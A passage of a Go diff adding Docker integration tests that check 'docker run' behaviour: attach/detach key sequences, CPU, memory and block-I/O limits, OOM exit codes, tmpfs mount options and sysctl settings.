"/tmp/tmpfs") + out, _, _, err := runCommandWithStdoutStderr(runCmd) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, filepath.Base(f.Name()), check.Commentf("Recursive bind mount test failed. 
Expected file not found")) +} + +func (s *DockerSuite) TestRunDeviceDirectory(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + if _, err := os.Stat("/dev/snd"); err != nil { + c.Skip("Host does not have /dev/snd") + } + + out, _ := dockerCmd(c, "run", "--device", "/dev/snd:/dev/snd", "busybox", "sh", "-c", "ls /dev/snd/") + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "timer", check.Commentf("expected output /dev/snd/timer")) + + out, _ = dockerCmd(c, "run", "--device", "/dev/snd:/dev/othersnd", "busybox", "sh", "-c", "ls /dev/othersnd/") + c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "seq", check.Commentf("expected output /dev/othersnd/seq")) +} + +// TestRunDetach checks attaching and detaching with the default escape sequence. +func (s *DockerSuite) TestRunAttachDetach(c *check.C) { + name := "attach-detach" + + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", name) + stdout, err := cmd.StdoutPipe() + c.Assert(err, checker.IsNil) + cpty, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer cpty.Close() + cmd.Stdin = tty + c.Assert(cmd.Start(), checker.IsNil) + c.Assert(waitRun(name), check.IsNil) + + _, err = cpty.Write([]byte("hello\n")) + c.Assert(err, checker.IsNil) + + out, err := bufio.NewReader(stdout).ReadString('\n') + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "hello") + + // escape sequence + _, err = cpty.Write([]byte{16}) + c.Assert(err, checker.IsNil) + time.Sleep(100 * time.Millisecond) + _, err = cpty.Write([]byte{17}) + c.Assert(err, checker.IsNil) + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + select { + case <-ch: + case <-time.After(10 * time.Second): + c.Fatal("timed out waiting for container to exit") + } + + running := inspectField(c, name, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be 
running")) + + out, _ = dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c), "-f", "container="+name) + // attach and detach event should be monitored + c.Assert(out, checker.Contains, "attach") + c.Assert(out, checker.Contains, "detach") +} + +// TestRunDetach checks attaching and detaching with the escape sequence specified via flags. +func (s *DockerSuite) TestRunAttachDetachFromFlag(c *check.C) { + name := "attach-detach" + keyCtrlA := []byte{1} + keyA := []byte{97} + + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", "--detach-keys=ctrl-a,a", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + c.Assert(waitRun(name), check.IsNil) + + if _, err := cpty.Write([]byte("hello\n")); err != nil { + c.Fatal(err) + } + + out, err := bufio.NewReader(stdout).ReadString('\n') + if err != nil { + c.Fatal(err) + } + if strings.TrimSpace(out) != "hello" { + c.Fatalf("expected 'hello', got %q", out) + } + + // escape sequence + if _, err := cpty.Write(keyCtrlA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + select { + case <-ch: + case <-time.After(10 * time.Second): + c.Fatal("timed out waiting for container to exit") + } + + running := inspectField(c, name, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) +} + +// TestRunDetach checks attaching and detaching with the escape sequence specified via flags. 
+func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) { + name := "attach-detach" + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "top") + c.Assert(waitRun(name), check.IsNil) + + // specify an invalid detach key, container will ignore it and use default + cmd := exec.Command(dockerBinary, "attach", "--detach-keys=ctrl-A,a", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + + bufReader := bufio.NewReader(stdout) + out, err := bufReader.ReadString('\n') + if err != nil { + c.Fatal(err) + } + // it should print a warning to indicate the detach key flag is invalid + errStr := "Invalid escape keys (ctrl-A,a) provided" + c.Assert(strings.TrimSpace(out), checker.Equals, errStr) +} + +// TestRunDetach checks attaching and detaching with the escape sequence specified via config file. 
+func (s *DockerSuite) TestRunAttachDetachFromConfig(c *check.C) { + keyCtrlA := []byte{1} + keyA := []byte{97} + + // Setup config + homeKey := homedir.Key() + homeVal := homedir.Get() + tmpDir, err := ioutil.TempDir("", "fake-home") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + dotDocker := filepath.Join(tmpDir, ".docker") + os.Mkdir(dotDocker, 0600) + tmpCfg := filepath.Join(dotDocker, "config.json") + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpDir) + + data := `{ + "detachKeys": "ctrl-a,a" + }` + + err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) + c.Assert(err, checker.IsNil) + + // Then do the work + name := "attach-detach" + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + c.Assert(waitRun(name), check.IsNil) + + if _, err := cpty.Write([]byte("hello\n")); err != nil { + c.Fatal(err) + } + + out, err := bufio.NewReader(stdout).ReadString('\n') + if err != nil { + c.Fatal(err) + } + if strings.TrimSpace(out) != "hello" { + c.Fatalf("expected 'hello', got %q", out) + } + + // escape sequence + if _, err := cpty.Write(keyCtrlA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + select { + case <-ch: + case <-time.After(10 * time.Second): + c.Fatal("timed out waiting for container to exit") + } + + running := inspectField(c, name, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) +} + +// TestRunDetach checks attaching and detaching with the detach flags, making sure it overrides 
config file +func (s *DockerSuite) TestRunAttachDetachKeysOverrideConfig(c *check.C) { + keyCtrlA := []byte{1} + keyA := []byte{97} + + // Setup config + homeKey := homedir.Key() + homeVal := homedir.Get() + tmpDir, err := ioutil.TempDir("", "fake-home") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + dotDocker := filepath.Join(tmpDir, ".docker") + os.Mkdir(dotDocker, 0600) + tmpCfg := filepath.Join(dotDocker, "config.json") + + defer func() { os.Setenv(homeKey, homeVal) }() + os.Setenv(homeKey, tmpDir) + + data := `{ + "detachKeys": "ctrl-e,e" + }` + + err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) + c.Assert(err, checker.IsNil) + + // Then do the work + name := "attach-detach" + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", "--detach-keys=ctrl-a,a", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + c.Assert(waitRun(name), check.IsNil) + + if _, err := cpty.Write([]byte("hello\n")); err != nil { + c.Fatal(err) + } + + out, err := bufio.NewReader(stdout).ReadString('\n') + if err != nil { + c.Fatal(err) + } + if strings.TrimSpace(out) != "hello" { + c.Fatalf("expected 'hello', got %q", out) + } + + // escape sequence + if _, err := cpty.Write(keyCtrlA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + select { + case <-ch: + case <-time.After(10 * time.Second): + c.Fatal("timed out waiting for container to exit") + } + + running := inspectField(c, name, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) +} + +func (s *DockerSuite) 
TestRunAttachInvalidDetachKeySequencePreserved(c *check.C) { + name := "attach-detach" + keyA := []byte{97} + keyB := []byte{98} + + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", "--detach-keys=a,b,c", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + c.Assert(waitRun(name), check.IsNil) + + // Invalid escape sequence aba, should print aba in output + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyB); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write([]byte("\n")); err != nil { + c.Fatal(err) + } + + out, err := bufio.NewReader(stdout).ReadString('\n') + if err != nil { + c.Fatal(err) + } + if strings.TrimSpace(out) != "aba" { + c.Fatalf("expected 'aba', got %q", out) + } +} + +// "test" should be printed +func (s *DockerSuite) TestRunWithCPUQuota(c *check.C) { + testRequires(c, cpuCfsQuota) + + file := "/sys/fs/cgroup/cpu/cpu.cfs_quota_us" + out, _ := dockerCmd(c, "run", "--cpu-quota", "8000", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "8000") + + out = inspectField(c, "test", "HostConfig.CpuQuota") + c.Assert(out, checker.Equals, "8000", check.Commentf("setting the CPU CFS quota failed")) +} + +func (s *DockerSuite) TestRunWithCpuPeriod(c *check.C) { + testRequires(c, cpuCfsPeriod) + + file := "/sys/fs/cgroup/cpu/cpu.cfs_period_us" + out, _ := dockerCmd(c, "run", "--cpu-period", "50000", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "50000") + + out, _ = dockerCmd(c, "run", "--cpu-period", 
"0", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "100000") + + out = inspectField(c, "test", "HostConfig.CpuPeriod") + c.Assert(out, checker.Equals, "50000", check.Commentf("setting the CPU CFS period failed")) +} + +func (s *DockerSuite) TestRunWithInvalidCpuPeriod(c *check.C) { + testRequires(c, cpuCfsPeriod) + out, _, err := dockerCmdWithError("run", "--cpu-period", "900", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "CPU cfs period can not be less than 1ms (i.e. 1000) or larger than 1s (i.e. 1000000)" + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--cpu-period", "2000000", "busybox", "true") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--cpu-period", "-3", "busybox", "true") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunWithKernelMemory(c *check.C) { + testRequires(c, kernelMemorySupport) + + file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes" + stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "--kernel-memory", "50M", "--name", "test1", "busybox", "cat", file) + c.Assert(strings.TrimSpace(stdout), checker.Equals, "52428800") + + out := inspectField(c, "test1", "HostConfig.KernelMemory") + c.Assert(out, check.Equals, "52428800") +} + +func (s *DockerSuite) TestRunWithInvalidKernelMemory(c *check.C) { + testRequires(c, kernelMemorySupport) + + out, _, err := dockerCmdWithError("run", "--kernel-memory", "2M", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Minimum kernel memory limit allowed is 4MB" + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--kernel-memory", "-16m", "--name", "test2", "busybox", "echo", "test") + c.Assert(err, check.NotNil) + expected = "invalid size" + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunWithCPUShares(c 
*check.C) { + testRequires(c, cpuShare) + + file := "/sys/fs/cgroup/cpu/cpu.shares" + out, _ := dockerCmd(c, "run", "--cpu-shares", "1000", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "1000") + + out = inspectField(c, "test", "HostConfig.CPUShares") + c.Assert(out, check.Equals, "1000") +} + +// "test" should be printed +func (s *DockerSuite) TestRunEchoStdoutWithCPUSharesAndMemoryLimit(c *check.C) { + testRequires(c, cpuShare) + testRequires(c, memoryLimitSupport) + out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--cpu-shares", "1000", "-m", "32m", "busybox", "echo", "test") + c.Assert(out, checker.Equals, "test\n", check.Commentf("container should've printed 'test'")) +} + +func (s *DockerSuite) TestRunWithCpusetCpus(c *check.C) { + testRequires(c, cgroupCpuset) + + file := "/sys/fs/cgroup/cpuset/cpuset.cpus" + out, _ := dockerCmd(c, "run", "--cpuset-cpus", "0", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + out = inspectField(c, "test", "HostConfig.CpusetCpus") + c.Assert(out, check.Equals, "0") +} + +func (s *DockerSuite) TestRunWithCpusetMems(c *check.C) { + testRequires(c, cgroupCpuset) + + file := "/sys/fs/cgroup/cpuset/cpuset.mems" + out, _ := dockerCmd(c, "run", "--cpuset-mems", "0", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + out = inspectField(c, "test", "HostConfig.CpusetMems") + c.Assert(out, check.Equals, "0") +} + +func (s *DockerSuite) TestRunWithBlkioWeight(c *check.C) { + testRequires(c, blkioWeight) + + file := "/sys/fs/cgroup/blkio/blkio.weight" + out, _ := dockerCmd(c, "run", "--blkio-weight", "300", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "300") + + out = inspectField(c, "test", "HostConfig.BlkioWeight") + c.Assert(out, check.Equals, "300") +} + +func (s *DockerSuite) TestRunWithInvalidBlkioWeight(c *check.C) { + testRequires(c, 
blkioWeight) + out, _, err := dockerCmdWithError("run", "--blkio-weight", "5", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) + expected := "Range of blkio weight is from 10 to 1000" + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioWeightDevice(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--blkio-weight-device", "/dev/sdX:100", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceReadBps(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--device-read-bps", "/dev/sdX:500", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceWriteBps(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--device-write-bps", "/dev/sdX:500", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceReadIOps(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--device-read-iops", "/dev/sdX:500", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceWriteIOps(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--device-write-iops", "/dev/sdX:500", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunOOMExitCode(c *check.C) { + testRequires(c, memoryLimitSupport, swapMemorySupport) + errChan := make(chan error) + go func() { + defer close(errChan) + out, exitCode, _ := dockerCmdWithError("run", "-m", "4MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + if expected := 137; exitCode != expected { + errChan <- fmt.Errorf("wrong exit code for OOM 
container: expected %d, got %d (output: %q)", expected, exitCode, out) + } + }() + + select { + case err := <-errChan: + c.Assert(err, check.IsNil) + case <-time.After(600 * time.Second): + c.Fatal("Timeout waiting for container to die on OOM") + } +} + +func (s *DockerSuite) TestRunWithMemoryLimit(c *check.C) { + testRequires(c, memoryLimitSupport) + + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "-m", "32M", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(stdout), checker.Equals, "33554432") + + out := inspectField(c, "test", "HostConfig.Memory") + c.Assert(out, check.Equals, "33554432") +} + +// TestRunWithoutMemoryswapLimit sets memory limit and disables swap +// memory limit, this means the processes in the container can use +// 16M memory and as much swap memory as they need (if the host +// supports swap memory). +func (s *DockerSuite) TestRunWithoutMemoryswapLimit(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + dockerCmd(c, "run", "-m", "32m", "--memory-swap", "-1", "busybox", "true") +} + +func (s *DockerSuite) TestRunWithSwappiness(c *check.C) { + testRequires(c, memorySwappinessSupport) + file := "/sys/fs/cgroup/memory/memory.swappiness" + out, _ := dockerCmd(c, "run", "--memory-swappiness", "0", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + out = inspectField(c, "test", "HostConfig.MemorySwappiness") + c.Assert(out, check.Equals, "0") +} + +func (s *DockerSuite) TestRunWithSwappinessInvalid(c *check.C) { + testRequires(c, memorySwappinessSupport) + out, _, err := dockerCmdWithError("run", "--memory-swappiness", "101", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Valid memory swappiness range is 0-100" + c.Assert(out, checker.Contains, expected, check.Commentf("Expected output to contain %q, not %q", out, expected)) + + 
out, _, err = dockerCmdWithError("run", "--memory-swappiness", "-10", "busybox", "true") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, expected, check.Commentf("Expected output to contain %q, not %q", out, expected)) +} + +func (s *DockerSuite) TestRunWithMemoryReservation(c *check.C) { + testRequires(c, memoryReservationSupport) + + file := "/sys/fs/cgroup/memory/memory.soft_limit_in_bytes" + out, _ := dockerCmd(c, "run", "--memory-reservation", "200M", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "209715200") + + out = inspectField(c, "test", "HostConfig.MemoryReservation") + c.Assert(out, check.Equals, "209715200") +} + +func (s *DockerSuite) TestRunWithMemoryReservationInvalid(c *check.C) { + testRequires(c, memoryLimitSupport) + testRequires(c, memoryReservationSupport) + out, _, err := dockerCmdWithError("run", "-m", "500M", "--memory-reservation", "800M", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Minimum memory limit can not be less than memory reservation limit" + c.Assert(strings.TrimSpace(out), checker.Contains, expected, check.Commentf("run container should fail with invalid memory reservation")) + + out, _, err = dockerCmdWithError("run", "--memory-reservation", "1k", "busybox", "true") + c.Assert(err, check.NotNil) + expected = "Minimum memory reservation allowed is 4MB" + c.Assert(strings.TrimSpace(out), checker.Contains, expected, check.Commentf("run container should fail with invalid memory reservation")) +} + +func (s *DockerSuite) TestStopContainerSignal(c *check.C) { + out, _ := dockerCmd(c, "run", "--stop-signal", "SIGUSR1", "-d", "busybox", "/bin/sh", "-c", `trap 'echo "exit trapped"; exit 0' USR1; while true; do sleep 1; done`) + containerID := strings.TrimSpace(out) + + c.Assert(waitRun(containerID), checker.IsNil) + + dockerCmd(c, "stop", containerID) + out, _ = dockerCmd(c, "logs", containerID) + + c.Assert(out, checker.Contains, "exit trapped", 
check.Commentf("Expected `exit trapped` in the log")) +} + +func (s *DockerSuite) TestRunSwapLessThanMemoryLimit(c *check.C) { + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + out, _, err := dockerCmdWithError("run", "-m", "16m", "--memory-swap", "15m", "busybox", "echo", "test") + expected := "Minimum memoryswap limit should be larger than memory limit" + c.Assert(err, check.NotNil) + + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunInvalidCpusetCpusFlagValue(c *check.C) { + testRequires(c, cgroupCpuset, SameHostDaemon) + + sysInfo := sysinfo.New(true) + cpus, err := parsers.ParseUintList(sysInfo.Cpus) + c.Assert(err, check.IsNil) + var invalid int + for i := 0; i <= len(cpus)+1; i++ { + if !cpus[i] { + invalid = i + break + } + } + out, _, err := dockerCmdWithError("run", "--cpuset-cpus", strconv.Itoa(invalid), "busybox", "true") + c.Assert(err, check.NotNil) + expected := fmt.Sprintf("Error response from daemon: Requested CPUs are not available - requested %s, available: %s", strconv.Itoa(invalid), sysInfo.Cpus) + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunInvalidCpusetMemsFlagValue(c *check.C) { + testRequires(c, cgroupCpuset) + + sysInfo := sysinfo.New(true) + mems, err := parsers.ParseUintList(sysInfo.Mems) + c.Assert(err, check.IsNil) + var invalid int + for i := 0; i <= len(mems)+1; i++ { + if !mems[i] { + invalid = i + break + } + } + out, _, err := dockerCmdWithError("run", "--cpuset-mems", strconv.Itoa(invalid), "busybox", "true") + c.Assert(err, check.NotNil) + expected := fmt.Sprintf("Error response from daemon: Requested memory nodes are not available - requested %s, available: %s", strconv.Itoa(invalid), sysInfo.Mems) + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunInvalidCPUShares(c *check.C) { + testRequires(c, cpuShare, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cpu-shares", "1", "busybox", "echo", "test") + 
c.Assert(err, check.NotNil, check.Commentf(out)) + expected := "The minimum allowed cpu-shares is 2" + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--cpu-shares", "-1", "busybox", "echo", "test") + c.Assert(err, check.NotNil, check.Commentf(out)) + expected = "shares: invalid argument" + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--cpu-shares", "99999999", "busybox", "echo", "test") + c.Assert(err, check.NotNil, check.Commentf(out)) + expected = "The maximum allowed cpu-shares is" + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunWithDefaultShmSize(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "shm-default" + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "mount") + shmRegex := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=65536k`) + if !shmRegex.MatchString(out) { + c.Fatalf("Expected shm of 64MB in mount command, got %v", out) + } + shmSize := inspectField(c, name, "HostConfig.ShmSize") + c.Assert(shmSize, check.Equals, "67108864") +} + +func (s *DockerSuite) TestRunWithShmSize(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "shm" + out, _ := dockerCmd(c, "run", "--name", name, "--shm-size=1G", "busybox", "mount") + shmRegex := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=1048576k`) + if !shmRegex.MatchString(out) { + c.Fatalf("Expected shm of 1GB in mount command, got %v", out) + } + shmSize := inspectField(c, name, "HostConfig.ShmSize") + c.Assert(shmSize, check.Equals, "1073741824") +} + +func (s *DockerSuite) TestRunTmpfsMountsEnsureOrdered(c *check.C) { + tmpFile, err := ioutil.TempFile("", "test") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + out, _ := dockerCmd(c, "run", "--tmpfs", "/run", "-v", tmpFile.Name()+":/run/test", "busybox", "ls", "/run") + c.Assert(out, checker.Contains, "test") +} + +func (s *DockerSuite) TestRunTmpfsMounts(c *check.C) { + // TODO Windows (Post TP5): 
This test cannot run on a Windows daemon as + // Windows does not support tmpfs mounts. + testRequires(c, DaemonIsLinux) + if out, _, err := dockerCmdWithError("run", "--tmpfs", "/run", "busybox", "touch", "/run/somefile"); err != nil { + c.Fatalf("/run directory not mounted on tmpfs %q %s", err, out) + } + if out, _, err := dockerCmdWithError("run", "--tmpfs", "/run:noexec", "busybox", "touch", "/run/somefile"); err != nil { + c.Fatalf("/run directory not mounted on tmpfs %q %s", err, out) + } + if out, _, err := dockerCmdWithError("run", "--tmpfs", "/run:noexec,nosuid,rw,size=5k,mode=700", "busybox", "touch", "/run/somefile"); err != nil { + c.Fatalf("/run failed to mount on tmpfs with valid options %q %s", err, out) + } + if _, _, err := dockerCmdWithError("run", "--tmpfs", "/run:foobar", "busybox", "touch", "/run/somefile"); err == nil { + c.Fatalf("/run mounted on tmpfs when it should have vailed within invalid mount option") + } + if _, _, err := dockerCmdWithError("run", "--tmpfs", "/run", "-v", "/run:/run", "busybox", "touch", "/run/somefile"); err == nil { + c.Fatalf("Should have generated an error saying Duplicate mount points") + } +} + +func (s *DockerSuite) TestRunTmpfsMountsOverrideImageVolumes(c *check.C) { + name := "img-with-volumes" + _, err := buildImage( + name, + ` + FROM busybox + VOLUME /run + RUN touch /run/stuff + `, + true) + if err != nil { + c.Fatal(err) + } + out, _ := dockerCmd(c, "run", "--tmpfs", "/run", name, "ls", "/run") + c.Assert(out, checker.Not(checker.Contains), "stuff") +} + +// Test case for #22420 +func (s *DockerSuite) TestRunTmpfsMountsWithOptions(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectedOptions := []string{"rw", "nosuid", "nodev", "noexec", "relatime"} + out, _ := dockerCmd(c, "run", "--tmpfs", "/tmp", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } + c.Assert(out, checker.Not(checker.Contains), "size=") + + 
expectedOptions = []string{"rw", "nosuid", "nodev", "noexec", "relatime"} + out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:rw", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } + c.Assert(out, checker.Not(checker.Contains), "size=") + + expectedOptions = []string{"rw", "nosuid", "nodev", "relatime", "size=8192k"} + out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:rw,exec,size=8192k", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } + + expectedOptions = []string{"rw", "nosuid", "nodev", "noexec", "relatime", "size=4096k"} + out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:rw,size=8192k,exec,size=4096k,noexec", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } + + // We use debian:jessie as there is no findmnt in busybox. Also the output will be in the format of + // TARGET PROPAGATION + // /tmp shared + // so we only capture `shared` here. 
+ expectedOptions = []string{"shared"} + out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:shared", "debian:jessie", "findmnt", "-o", "TARGET,PROPAGATION", "/tmp") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } +} + +func (s *DockerSuite) TestRunSysctls(c *check.C) { + + testRequires(c, DaemonIsLinux) + var err error + + out, _ := dockerCmd(c, "run", "--sysctl", "net.ipv4.ip_forward=1", "--name", "test", "busybox", "cat", "/proc/sys/net/ipv4/ip_forward") + c.Assert(strings.TrimSpace(out), check.Equals, "1") + + out = inspectFieldJSON(c, "test", "HostConfig.Sysctls") + + sysctls := make(map[string]string) + err = json.Unmarshal([]byte(out), &sysctls) + c.Assert(err, check.IsNil) + c.Assert(sysctls["net.ipv4.ip_forward"], check.Equals, "1") + + out, _ = dockerCmd(c, "run", "--sysctl", "net.ipv4.ip_forward=0", "--name", "test1", "busybox", "cat", "/proc/sys/net/ipv4/ip_forward") + c.Assert(strings.TrimSpace(out), check.Equals, "0") + + out = inspectFieldJSON(c, "test1", "HostConfig.Sysctls") + + err = json.Unmarshal([]byte(out), &sysctls) + c.Assert(err, check.IsNil) + c.Assert(sysctls["net.ipv4.ip_forward"], check.Equals, "0") + + runCmd := exec.Command(dockerBinary, "run", "--sysctl", "kernel.foobar=1", "--name", "test2", "busybox", "cat", "/proc/sys/kernel/foobar") + out, _, _ = runCommandWithOutput(runCmd) + if !strings.Contains(out, "invalid argument") { + c.Fatalf("expected --sysctl to fail, got %s", out) + } +} + +// TestRunSeccompProfileDenyUnshare checks that 'docker run --security-opt seccomp=/tmp/profile.json debian:jessie unshare' exits with operation not permitted. 
